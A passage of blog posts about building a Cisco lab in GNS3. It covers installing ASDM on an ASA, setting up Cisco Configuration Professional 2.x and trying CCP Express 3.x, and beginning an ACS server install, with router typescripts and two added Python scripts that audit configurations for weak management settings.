<span class="go">2024 bytes copied in 1.170 secs (2024 bytes/sec)</span>
<span class="gp">ciscoasa#</span>
</pre></div>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>Don’t forget to assign a name to the network interface using the <code>nameif</code>
command otherwise it will be unusable!</p>
</div>
<h4 id="copy-asdm-onto-the-asa-server"><a class="toclink" href="#copy-asdm-onto-the-asa-server">Copy <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> onto the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server</a></h4>
<p>Here Valerian Ceaus made another <a href="http://blog.ialex.info/how-to-configure-asa-for-asdm-access/" rel="external">good post</a> to describe <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr>
installation onto an <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server.</p>
<p>If you haven’t copied the <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> file onto your Windows host yet, now is
the time to do it.
A convenient way to transfer such files to your lab guests is to put them in an
<span class="caps">ISO</span> image which is then mounted by the guest.</p>
<p>I use <code>genisoimage</code> to generate such images.
If it is not already installed in your environment, install it (the exact
command depending on your distribution):</p>
<div class="codehilite"><pre>sudo aptitude install genisoimage
</pre></div>
<p>The following command creates the <em>asdm.iso</em> file containing all <em>asdm</em>*<em>.bin</em>
files, the <span class="caps">TFTP</span> server and the Java installer (Java 6 here as this version is a
requirement for <span class="caps">CCP</span>; if you only use <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> you should be fine with more recent
versions of Java<sup id="fnref-java_version"><a class="footnote-ref" href="#fn-java_version">1</a></sup>):</p>
<div class="codehilite"><pre>genisoimage -JR -o asdm.iso asdm*.bin tftpd64.460.zip jre-6u45-windows-i586.exe
</pre></div>
<p>Edit your Windows device settings, mount this <span class="caps">ISO</span> file in the <span class="caps">CD</span>-<span class="caps">ROM</span> drive, and
start your Windows host.</p>
<ol>
<li>
<p>On your Windows host, start the <span class="caps">TFTP</span> server and ensure that:</p>
<ul>
<li>The shared directory indeed contains your <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> file (<em>asdm-7</em>*<em>.bin</em>).</li>
<li>The listening interface is the external interface, reachable from the
<abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server.</li>
</ul>
</li>
<li>
<p>In the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server shell, use <span class="caps">TFTP</span> to retrieve the file:</p>
<div class="codehilite"><pre><span class="gp">ciscoasa# </span><span class="k">copy</span> tftp<span class="s">:</span> flash<span class="s">:</span>
<span class="go">Address or name of remote host []? </span><span class="s">192.168.0.100</span>
<span class="go">Source filename []? </span><span class="s">asdm-715-100.bin</span>
<span class="go">Destination filename [asdm-715-100.bin]?</span>
<span class="go">Accessing tftp://192.168.0.100/asdm-715-100.bin...!!!!!</span>
<span class="go">!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</span>
<span class="go">!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</span>
<span class="go">[truncated]</span>
<span class="go">!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</span>
<span class="go">Writing current ASDM file disk0:/asdm-715-100.bin</span>
<span class="go">!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</span>
<span class="go">!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</span>
<span class="go">[truncated]</span>
<span class="go">!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</span>
<span class="go">22824520 bytes copied in 66.740 secs (345826 bytes/sec)</span>
<span class="gp">ciscoasa#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>On the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>, <em>flash:</em> is an alias of <em>disk0:</em>, which is why the file
is reported as written to <em>disk0:</em> even though <em>flash:</em> was given as the
destination; either name can be used.</p>
<p><span class="caps">TFTP</span> provides neither authentication nor integrity checking, so once the
transfer is done compare the checksum of the copied file (the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> <em>verify</em>
command computes it) with the one Cisco publishes for that <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> release.</p>
</div>
</li>
</ol>
<p>Now enable <span class="caps">HTTPS</span> on the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server and set the credentials and the source <span class="caps">IP</span>
address authorized to access <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr>:</p>
<div class="codehilite"><pre><span class="gp">ciscoasa# </span><span class="k">conf</span> t
<span class="gp">ciscoasa(config)# </span><span class="k">username </span><span class="nv">admin </span>password <span class="s">Cisco123</span>
<span class="gp">ciscoasa(config)# </span><span class="k">aaa</span> authentication http console LOCAL
<span class="gp">ciscoasa(config)# </span><span class="k">http</span> server enable
<span class="gp">ciscoasa(config)# </span><span class="k">http </span><span class="s">192.168.0.100 255.255.255.255 </span><span class="nv">inside</span>
<span class="gp">ciscoasa(config)# </span><span class="k">asdm</span> image <span class="s">disk0:/asdm-715-100.bin</span>
<span class="gp">ciscoasa(config)# </span><span class="nb">exit</span>
<span class="gp">ciscoasa# </span><span class="k">copy</span> run start
<span class="go">Source filename [running-config]?</span>
<span class="go">Cryptochecksum: 5fa74a4e e53c0aff c21234ef a2c32a86</span>
<span class="go">2217 bytes copied in 1.90 secs (2217 bytes/sec)</span>
<span class="gp">ciscoasa#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Here I use <em>192.168.0.100</em> which is the <span class="caps">IP</span> address of the Windows management
host, in other words the <span class="caps">IP</span> address authorized to access the <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr>.</p>
<p>You can replace this with the <span class="caps">IP</span> address matching your setup; you can also allow
a whole subnet to access <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> by modifying the netmask, for instance:</p>
<div class="codehilite"><pre><span class="gp">ciscoasa(config)# </span><span class="k">http </span><span class="s">192.168.0.0 255.255.255.0 </span><span class="nv">inside</span>
</pre></div>
</div>
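<p>The two configuration steps above, bringing up an interface (with its <code>nameif</code> pitfall) and opening <span class="caps">HTTPS</span>/<abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> access restricted by <code>http</code> entries and local authentication, can be checked mechanically against a saved configuration before the lab is wired to anything else. The following Python script is an added example, not part of the original post and not a Cisco tool: it lints an <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> running-config excerpt for an interface that carries an <span class="caps">IP</span> address without a <code>nameif</code>, for an <code>http</code> entry whose mask is 0.0.0.0 (which opens <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> to any source on that interface), and for a missing <code>aaa authentication http console LOCAL</code> line (without it <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> logs in with a blank username and the enable password). The sample configuration embedded in it is constructed for the demonstration and only uses the commands shown on this page.</p>

```python
"""Lint an ASA configuration excerpt for the ASDM lab-setup pitfalls.

Added example: this is not Cisco tooling and not part of the original post.
It only understands the handful of commands used on this page.
"""
import ipaddress
import re

# Constructed sample: GigabitEthernet1 lacks `nameif`, and the second `http`
# entry opens ASDM to any source on the "outside" interface.
SAMPLE_CONFIG = """\
interface GigabitEthernet0
 nameif inside
 security-level 100
 ip address 192.168.0.1 255.255.255.0
!
interface GigabitEthernet1
 ip address 10.0.0.1 255.255.255.0
!
username admin password Cisco123
aaa authentication http console LOCAL
http server enable
http 192.168.0.100 255.255.255.255 inside
http 0.0.0.0 0.0.0.0 outside
asdm image disk0:/asdm-715-100.bin
"""


def parse_interfaces(config):
    """Map each interface name to {first keyword: full sub-command line}.

    ASA sub-commands are indented by one space; a non-indented line ends the block.
    """
    interfaces = {}
    current = None
    for line in config.splitlines():
        if line.startswith("interface "):
            current = line.split(None, 1)[1].strip()
            interfaces[current] = {}
        elif line.startswith(" ") and current is not None:
            words = line.split()
            interfaces[current][words[0]] = " ".join(words)
        else:
            current = None
    return interfaces


def lint_asa_config(config):
    """Return a list of human-readable findings (an empty list means nothing found)."""
    findings = []

    # 1. An interface with an address but no nameif passes no traffic at all.
    for name, cmds in parse_interfaces(config).items():
        if "ip" in cmds and "nameif" not in cmds:
            findings.append(f"{name}: has an IP address but no 'nameif', it is unusable")

    lines = [l.strip() for l in config.splitlines()]
    if "http server enable" not in lines:
        return findings  # no ASDM/HTTPS exposure to check

    # 2. Every `http <ip> <mask> <nameif>` entry must actually restrict sources.
    http_rules = [l for l in lines if re.match(r"^http \d", l)]
    if not http_rules:
        findings.append("'http server enable' without any 'http <ip> <mask> <nameif>' entry: ASDM is unreachable")
    for rule in http_rules:
        try:
            _, ip, mask, nameif = rule.split()
            allowed = ipaddress.IPv4Network((ip, mask), strict=False)
        except ValueError:
            findings.append(f"'{rule}': could not parse address or mask")
            continue
        if allowed.prefixlen == 0:
            findings.append(f"'{rule}': allows ASDM access from any source on '{nameif}'")

    # 3. Without HTTP authentication, ASDM logs in with a blank username and the enable password.
    if "aaa authentication http console LOCAL" not in lines:
        findings.append("no 'aaa authentication http console LOCAL': ASDM will not use per-user credentials")
    return findings


if __name__ == "__main__":
    for finding in lint_asa_config(SAMPLE_CONFIG):
        print(finding)
```

<p>Run it on the output of <code>show running-config</code> pasted into a file; on the sample it reports the unnamed <em>GigabitEthernet1</em> and the wide-open <code>http 0.0.0.0 0.0.0.0 outside</code> entry, while the exact configuration typed on this page produces no finding.</p>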
<p>From your Windows machine, now use a browser to connect to <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>‘s <span class="caps">HTTPS</span> port
(<em>https://192.168.0.1</em> for instance) and click on the link to install the
<abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> launcher.
Accept the certificate warning (the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> presents a self-signed certificate by
default), enter the credentials you defined above, and your <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> should
now be ready.</p>
<p><span class="lb-small"><a href="#welcome.png" id="welcome.png-thumb" title="Click to enlarge"><img alt="ASDM welcome screen" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-adaptative-security-appliance-asa-in-gns3/welcome.png"/></a></span></p>
<h4 id="post-install"><a class="toclink" href="#post-install">Post-install</a></h4>
<p>Now that the installation is complete, don’t forget to edit the template device
settings and, below the <em>Advanced</em> tab, tick the <em>Use as a linked base <span class="caps">VM</span></em> checkbox.</p>
<div class="footnote">
<hr/>
<ol>
<li id="fn-java_version">
<p>I tested <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> 7.1.5 with <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> 8.4.2 with the latest versions
of Java (8) and Windows (2016) without encountering any issue.
The <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> link may not appear in Windows’ <em>Start</em> menu, so you need to
manually start the <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> launcher from
<em>C:\Program Files (x86)\Cisco Systems\<abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr>\</em>. <a class="footnote-backref" href="#fnref-java_version" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
</ol>
</div>How to install Cisco Configuration Professional (CCP) in GNS32017-08-28T00:00:00+02:002017-11-23T00:00:00+01:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-08-28:/posts/2017/08/28/how-to-install-cisco-configuration-professional-ccp-in-gns3/<p>The <a href="https://www.cisco.com/c/en/us/products/cloud-systems-management/configuration-professional/index.html" rel="external" title="Cisco Configuration Professional (Cisco)">Cisco Configuration Professional (<span class="caps">CCP</span>)</a> is a graphical interface
allowing one to quickly and easily configure, monitor and troubleshoot Cisco
<span class="caps">IOS</span>-based devices.
It does exactly the same thing as one could do using the <span class="caps">IOS</span> command line, but
with more convenient graphical tools and optional wizards for multi-step
configuration, including operations involving several devices like setting up
a tunnel.</p>
<p>It comes in two versions:</p>
<ul>
<li>
<p><em><span class="caps">CCP</span> 2.x</em>, the successor of the <em>Router and Security Device Manager (<span class="caps">SDM</span>)</em>,
is the little brother of <span class="caps">ASDM</span> used to configure <span class="caps">ASA</span> firewalls.
This is a desktop application: the <span class="caps">GUI</span> is installed locally on the user’s host.</p>
</li>
<li>
<p><em><span class="caps">CCP</span> “Express” 3.x</em>: this version is deployed on the Cisco devices themselves
and leverages the device’s <span class="caps">HTTP</span> server to embed a web configuration interface.
<span class="caps">CCP</span> Express already existed in the 2.x generation; at that time two flavors
were available: the <em>“end-user”</em> one with reduced functionality
(the end result was very similar to home Internet boxes) and the
<em>“administrator”</em> one.
The current 3.x version only carries over the <em>“administrator”</em> flavor.</p>
</li>
</ul>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>For people training for the <a href="/posts/2017/09/01/cisco-ccna-security-certification-review/" title="Cisco CCNA Security certification review"><span class="caps">CCNA</span>-Security certification</a>,
as of writing this post, being comfortable in using <span class="caps">CCP</span> 2.x is mandatory.</p>
<p>As far as I know, <span class="caps">CCP</span> Express 3.x however is out-of-scope.</p>
</div>
<p><span class="caps">CCP</span> is <a href="https://software.cisco.com/download/type.html?mdfid=281795035&catid=null" rel="external" title="Download Software: Configuration Professional (Cisco)">freely downloadable</a> from Cisco website (you only need to register).</p>
<h3 id="ccp-2x-cisco-sdm"><a class="toclink" href="#ccp-2x-cisco-sdm"><span class="caps">CCP</span> 2.x (Cisco <span class="caps">SDM</span>)</a></h3>
<p><span class="lb-small"><a href="#screenshot_ccp2.png" id="screenshot_ccp2.png-thumb" title="Click to enlarge"><img alt="CCP 2.x screenshot" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-configuration-professional-ccp-in-gns3/screenshot_ccp2.png"/></a></span></p>
<h4 id="prerequisites-and-installation"><a class="toclink" href="#prerequisites-and-installation">Prerequisites and installation</a></h4>
<p>The latest version currently available is 2.5 and was published in 2008.
Yet it is still part of the <span class="caps">CCNA</span>-Security curriculum as per Cisco’s
<a href="https://www.amazon.com/CCNA-Security-210-260-Official-Guide/dp/1587205661?tag=electronicfro-20" rel="external" title="CCNA Security 210-260 Official Cert Guide (Amazon)"><span class="caps">CCNA</span>-Security official cert guide</a> which describes its use in
detail (but does not cover the deployment).</p>
<p>Now is the time to check that you are seated comfortably.
If your chair is equipped with a seat-belt, fasten it.
If there are any children in the room, please keep them away.
Ah, and let’s add one of those nice red banners too:</p>
<div class="admonition warning">
<p class="admonition-title">Advisory</p>
<p><strong>Gory details follow!</strong></p>
</div>
<p>Still with me? Okay.
<span class="caps">CCP</span> 2.x installation and use are quite straightforward as soon as you
have <em>all</em> the prerequisites right.
I warn you that they are just totally insane; they make my eyes bleed each time I
look at them:</p>
<ul>
<li>I recommend using Windows 7: maybe it works on other systems but I did not
try it.</li>
<li>You must use Internet Explorer (no Chrome, Firefox, Edge or whatever).</li>
<li>On <span class="caps">IE</span>, you must enable the <em>Compatibility View</em> mode for the host
<em>127.0.0.1</em> (you can find <span class="caps">IE</span>’s <em>Compatibility View</em> option below the <em>Tools</em>
option in the menu-bar, press the <em>Alt</em> key to display the menu-bar)</li>
<li>You must install the Adobe Flash Player for <span class="caps">IE</span> (no particular prerequisite
on Flash Player version, the latest should be fine).</li>
<li>You must use the obsolete and unsupported Java 1.6 (don’t try any newer
version, it won’t work), and the 32-bit version even on 64-bit systems,
as this is usually the only one browsers support.
Old Java releases can be found on the
<a href="http://www.oracle.com/technetwork/java/javase/downloads/java-archive-downloads-javase6-419409.html" rel="external" title="Java SE 6 Downloads (Oracle)">Java Archives page</a>; the binary I’m using is named
<em>jre-6u45-windows-i586.exe</em>.</li>
<li>In Java properties (usually accessible through either an icon in the
notification bar or an icon in Windows Control Panel), add the parameter
<code>-Xmx512m</code> to increase the Heap Memory size allocatable by <span class="caps">CCP</span> as the
default is too low.</li>
<li>If you are using the <span class="caps">EMET</span> security tool, disable or uninstall it as it
interferes with <span class="caps">CCP</span> processing.</li>
<li>Once <span class="caps">CCP</span> has been installed, copy its shortcut to your desktop and, in its
<em>Advanced</em> properties, tick the checkbox that makes it always run with local
Administrator privileges.</li>
</ul>
<p>So, to summarize, <span class="caps">CCP</span> is a simple <span class="caps">GUI</span> sending <span class="caps">TCP</span> requests to remote <span class="caps">IOS</span> devices,
and to do this it requires both Flash and an obsolete version of Java,
security features disabled on both the browser and the system, and to be run as
administrator.
<em>“Security Device Manager”</em> they call it, yeah!</p>
<p>Once you satisfy all prerequisites, the installation is straightforward.</p>
<h4 id="devices-preparation"><a class="toclink" href="#devices-preparation">Devices preparation</a></h4>
<p>First, connect the Windows host running <span class="caps">CCP</span> to a device to configure, here a router:</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="Topology linking the Windows CCP host to a router" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-configuration-professional-ccp-in-gns3/topology.png"/></a></span></p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>A <span class="caps">VM</span> node must be shut down to be able to edit its network links.</p>
<p>If you want to gain more flexibility, just add a basic <span class="caps">GNS3</span> switch
between the Windows host and the router: you won’t need to shut down the
Windows host anymore when changing the devices connected to the switch.</p>
</div>
<p><span class="caps">CCP</span> requires both command-line and <span class="caps">HTTP</span>(S) access to the device.
After configuring the network interface, you must create a privilege 15 account and
start the <span class="caps">HTTP</span>(S) service.</p>
<p>Here is the typescript showing a quick device configuration:</p>
<div class="codehilite"><pre><span class="gp">R1#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="gp">R1(config)#</span><span class="k">int</span><span class="s"> fa0/0</span>
<span class="gp">R1(config-if)#</span><span class="k">ip</span> add <span class="s">192.168.0.11</span> <span class="s">255.255.255.0</span>
<span class="gp">R1(config-if)#</span><span class="ow">no </span><span class="k">shut</span>
<span class="gp">R1(config-if)#</span>
<span class="gt">*Mar 1 00:01:09.039: %LINK-3-UPDOWN: Interface FastEthernet0/0, changed state to up</span>
<span class="gt">*Mar 1 00:01:10.039: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/0, changed state to up</span>
<span class="gp">R1(config-if)#</span><span class="nb">exit</span>
<span class="gp">R1(config)#</span><span class="k">username</span> admin privilege <span class="s">15</span> secret Cisco123
<span class="gp">R1(config)#</span><span class="k">ip</span> http secure-server
<span class="go">% Generating 1024 bit RSA keys, keys will be non-exportable...[OK]</span>
<span class="gp">R1(config)#</span>
<span class="gt">*Mar 1 00:01:47.247: %SSH-5-ENABLED: SSH 1.99 has been enabled</span>
<span class="gp">R1(config)#</span>
<span class="gt">*Mar 1 00:01:47.331: %PKI-4-NOAUTOSAVE: Configuration was modified. Issue "write memory" to save new certificate</span>
<span class="gp">R1(config)#</span><span class="k">ip</span> http authentication local
<span class="gp">R1(config)#</span><span class="nb">exit</span>
<span class="gp">R1#</span>
<span class="gt">*Mar 1 00:02:07.791: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">R1#</span><span class="k">copy</span> run start
<span class="go">Destination filename [startup-config]?</span>
<span class="go">Building configuration...</span>
<span class="go">[OK]</span>
<span class="gp">R1#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>In this example I use <code>ip http secure-server</code> to enable <span class="caps">HTTPS</span> communication
between <span class="caps">CCP</span> and the device.</p>
<p><span class="caps">CCP</span> also supports plain-<span class="caps">HTTP</span> communication; use <code>ip http server</code> in this
case.
Beware that the communication between <span class="caps">CCP</span> and the device (credentials
included) then transits in clear text over the network and can be intercepted
or altered.</p>
</div>
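<p>The typescript above is the minimum that gets <span class="caps">CCP</span> talking to the router, and it leaves a few management-plane points worth checking before such a device is exposed beyond a lab: without <code>ip http authentication</code> the <span class="caps">HTTP</span> server falls back to the enable password, nothing restricts which hosts may reach it (<code>ip http access-class</code>), a <code>username … password</code> line (as opposed to <code>secret</code>) stores a reversible password, and the console output shows that <code>ip http secure-server</code> auto-generated a 1024-bit <span class="caps">RSA</span> key pair. The Python script below is an added example written for this page, not code from the original post, which audits a running-config excerpt and the console log for those points. The excerpt and log line are constructed to mirror the typescript, with an extra <code>ip http server</code> line and a second account added as the weak variants; the 2048-bit minimum is this example’s threshold, not a value from the post.</p>

```python
import re

# Constructed running-config excerpt mirroring the post's typescript, with an
# extra "ip http server" line and a second account as the weak variants.
SAMPLE_CONFIG = """\
!
username admin privilege 15 secret 5 $1$abcd$FhT0Y6sQcRqPzJ0Lk0ZvS1
username helpdesk privilege 15 password 0 Helpdesk123
!
interface FastEthernet0/0
 ip address 192.168.0.11 255.255.255.0
!
ip http server
ip http secure-server
ip http authentication local
!
"""

# Constructed console line matching what IOS printed in the typescript.
SAMPLE_LOG = "% Generating 1024 bit RSA keys, keys will be non-exportable...[OK]"

MIN_RSA_BITS = 2048  # this example's threshold, not a value from the post


def audit_http_management(config):
    """Return findings about how the IOS HTTP(S) management server that CCP
    relies on is exposed; an empty list means every check passed."""
    lines = [line.strip() for line in config.splitlines()]
    findings = []
    if "ip http server" in lines:
        findings.append("ip http server: clear-text HTTP management is enabled, "
                        "CCP logins and the device configuration cross the wire unencrypted")
    if "ip http secure-server" not in lines:
        findings.append("ip http secure-server missing: CCP cannot connect over HTTPS")
    if not any(line.startswith("ip http authentication ") for line in lines):
        findings.append("ip http authentication not set: the HTTP server defaults to "
                        "the enable password instead of per-user accounts")
    if not any(line.startswith("ip http access-class ") for line in lines):
        findings.append("ip http access-class missing: the management server answers "
                        "any source address, not only the CCP host")
    for line in lines:
        # "username X ... password ..." keeps a type 0/7 (reversible) password,
        # whereas "username X ... secret ..." keeps a hash.
        match = re.match(r"username (\S+) .*\bpassword\b", line)
        if match:
            findings.append(f"username {match.group(1)}: the 'password' keyword stores a "
                            "reversible (type 0/7) password, use 'secret' instead")
    return findings


def rsa_key_bits_from_log(log):
    """Extract the modulus size IOS announced when it generated the HTTPS key pair."""
    match = re.search(r"Generating (\d+) bit RSA keys", log)
    return int(match.group(1)) if match else None


def audit_rsa_key(log):
    """Flag an auto-generated key pair smaller than MIN_RSA_BITS."""
    bits = rsa_key_bits_from_log(log)
    if bits is not None and bits < MIN_RSA_BITS:
        return [f"HTTPS server key pair is {bits}-bit RSA, below the {MIN_RSA_BITS}-bit "
                "minimum; generate a stronger pair (crypto key generate rsa modulus 2048) "
                "for the HTTPS trustpoint"]
    return []


if __name__ == "__main__":
    for finding in audit_http_management(SAMPLE_CONFIG) + audit_rsa_key(SAMPLE_LOG):
        print("-", finding)
```

<p>Feed it the output of <code>show running-config</code> copied from the device; on the sample excerpt it reports the clear-text <span class="caps">HTTP</span> server, the missing access-class and the reversible <em>helpdesk</em> password, plus the weak key pair from the log.</p>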
<h4 id="ccp-initialization"><a class="toclink" href="#ccp-initialization"><span class="caps">CCP</span> initialization</a></h4>
<p>When you start <span class="caps">CCP</span>, you are first presented with what looks like a login window:</p>
<p><span class="lb-small"><a href="#cco_auth.png" id="cco_auth.png-thumb" title="Click to enlarge"><img alt="Cisco CCO authentication window" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-configuration-professional-ccp-in-gns3/cco_auth.png"/></a></span></p>
<p>Just clicking <em><span class="caps">OK</span></em> doesn’t work; my first reflex was to search for the <span class="caps">CCP</span> default
password.
Actually, this window asks you for your Cisco Connection Online (<span class="caps">CCO</span>)
credentials, and is an optional step whose only purpose is to let <span class="caps">CCP</span> send usage reports to Cisco.</p>
<p>Just <em>Cancel</em> or untick the <em>Enable</em> checkbox.</p>
<p>You are then asked for your devices’ <span class="caps">IP</span> addresses and credentials.</p>
<p><span class="lb-small"><a href="#community.png" id="community.png-thumb" title="Click to enlarge"><img alt="Community management window" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-configuration-professional-ccp-in-gns3/community.png"/></a></span></p>
<p>Filling this window is straightforward.
Check <em>Connect Securely</em> for the devices on which you enabled <span class="caps">HTTPS</span>.</p>
<p>Don’t forget to check <em>Discover all devices</em> in the bottom left corner
to automatically launch the discovery of all devices as soon as you press the
<em><span class="caps">OK</span></em> button.
If you forget to check it, this is not a big deal: on the next screen simply
select your devices (use <em>Ctrl</em> or <em>Shift</em> to select several devices at once)
and click on the <em>Discover</em> button at the bottom to manually launch the same operation.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p><span class="caps">CCP</span> does not store device properties in its database.
On each start you need it to <em>discover</em> them: <span class="caps">CCP</span> connects to the
devices, detects their type and collects all relevant properties.</p>
<p>When using devices virtualized in <span class="caps">GNS3</span> with common <span class="caps">IOS</span> images, you may
get a <em>“Discovered with warnings”</em> status.
Clicking on the <em>Discovery details</em> button usually tells that the warning
is generated because the device is not supported by <span class="caps">CCP</span> and that some
functionality may not behave as expected.</p>
<p>This is a normal message and personally I never encountered any odd behavior.</p>
</div>
<h3 id="ccp-express-3x"><a class="toclink" href="#ccp-express-3x"><span class="caps">CCP</span> “Express” 3.x</a></h3>
<p><span class="lb-small"><a href="#screenshot_ccp3.jpg" id="screenshot_ccp3.jpg-thumb" title="Click to enlarge"><img alt="CCP Express 3.x screenshot" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-configuration-professional-ccp-in-gns3/screenshot_ccp3.jpg"/></a></span></p>
<p>This one is more regularly maintained; nevertheless I did not manage to
install it due to errors potentially related to the <span class="caps">GNS3</span> virtualization environment.</p>
<p>The installation process is <a href="https://www.cisco.com/c/en/us/td/docs/net_mgmt/cisco_configuration_professional_express/v3_1/guides/adminguide/CCP_admin_guide/installing_ccp_express_adminview.html" rel="external" title="Cisco Configuration Professional Express 3.1 Administration Guide (Cisco)">documented by Cisco</a>, but it
<a href="https://learningnetwork.cisco.com/thread/51677" rel="external" title="copying multiple config files (The Cisco Learning Network forum)">doesn’t work</a>, first because <span class="caps">IOS</span> fails to simultaneously read from and
write to its flash memory.
To decompress the installation archive, you must therefore read it directly
from the <span class="caps">TFTP</span> server instead of copying it to the flash memory first:</p>
<div class="codehilite"><pre><span class="gp">R1# </span><span class="k">archive</span> tar /xtract <span class="s">tftp://192.168.0.100/ccpexpressAdmin_3_1_2_en.tar</span> flash<span class="s">:</span>
</pre></div>
<p>However the installation process then fails on the following step due to too
long file names:</p>
<div class="codehilite"><pre>Error opening flash:/ccpexp/CCPExpress_3.1_Open_Source_Documentation.html (File name too long)
</pre></div>
<p>According to the linked <a href="https://learningnetwork.cisco.com/thread/51677" rel="external" title="copying multiple config files (The Cisco Learning Network forum)">forum thread</a>, these issues seem to be
specific to the <span class="caps">GNS3</span> environment (maybe because of <span class="caps">GNS3</span> itself, or maybe because
using <span class="caps">GNS3</span> usually means using old, obsolete <span class="caps">IOS</span> images).
<em>In theory</em>, you should not encounter such issues with real gear.</p>
<p>I did not investigate this any further yet.</p>How to install Cisco Secure Access Control System (ACS) server in GNS32017-08-28T00:00:00+02:002017-08-28T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-08-28:/posts/2017/08/28/how-to-install-cisco-secure-access-control-system-acs-server-in-gns3/<p>Cisco Secure <a href="https://www.cisco.com/c/en/us/products/security/secure-access-control-system/index.html" rel="external" title="Cisco Secure Access Control System homepage (Cisco)">Access Control System</a> (<span class="caps">ACS</span> or <span class="caps">CSACS</span>) server is
Cisco’s Authentication, Authorization and Accounting (<span class="caps">AAA</span>) server, which centralizes
network device users’ permissions and auditing.</p>
<p>It supports the <abbr title="Terminal Access Controller Access-Control System"><span class="caps">TACACS</span></abbr>+ (Cisco proprietary) and <abbr title="Remote Authentication Dial-In User Service"><span class="caps">RADIUS</span></abbr> (open standard, usable with
non-Cisco devices) protocols.
It has its own user store, which is useful for lab tests, but in real life it
will most likely be connected to a Microsoft Active Directory server to
centralize user credential management.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p><span class="caps">ACS</span> is in the process of being replaced by its successor,
<em><a href="https://www.cisco.com/c/en/us/products/security/identity-services-engine/index.html" rel="external" title="Cisco Identity Services Engine homepage (Cisco)">Identity Services Engine (<span class="caps">ISE</span>)</a></em>.</p>
<p>For some time, the two products were to be used together, with <span class="caps">ACS</span> handling
authentication and authorization while <span class="caps">ISE</span> was focusing on host
policy-compliance checking.</p>
<p>For <span class="caps">CCNA</span>-Security students, as of now only <span class="caps">ACS</span> is really covered by the
curriculum.
<span class="caps">ISE</span> is just mentioned from time to time so you know what it is and why it
is used.</p>
</div>
<p>Evaluation versions of <span class="caps">ACS</span> can usually be obtained by contacting your Cisco
sales representative.<sup id="fnref-get-acs"><a class="footnote-ref" href="#fn-get-acs">1</a></sup></p>
<h3 id="prerequisites"><a class="toclink" href="#prerequisites">Prerequisites</a></h3>
<p>To install an <span class="caps">ACS</span> server, you will need the following things:</p>
<ul>
<li>
<p>The <em><span class="caps">ACS</span> installation <span class="caps">DVD</span></em>.</p>
<p>This <span class="caps">DVD</span> weighs around 1 <span class="caps">GB</span> and contains a heavily modified version of
CentOS (by the way, there is an <a href="https://routerjockey.com/2013/10/21/installing-vmware-tools-on-cisco-acs/" rel="external" title="Installing VMware tools on Cisco ACS (RouterJockey)">unofficial patch</a> that gives you
a full-blown Bash shell on your <span class="caps">ACS</span> server).</p>
<p>Do not confuse it with the older <em><span class="caps">ACS</span> for Windows</em> disc, which weighed
around 100 <span class="caps">MB</span>.
It was used to install an <span class="caps">ACS</span> server on a Windows machine, but this version
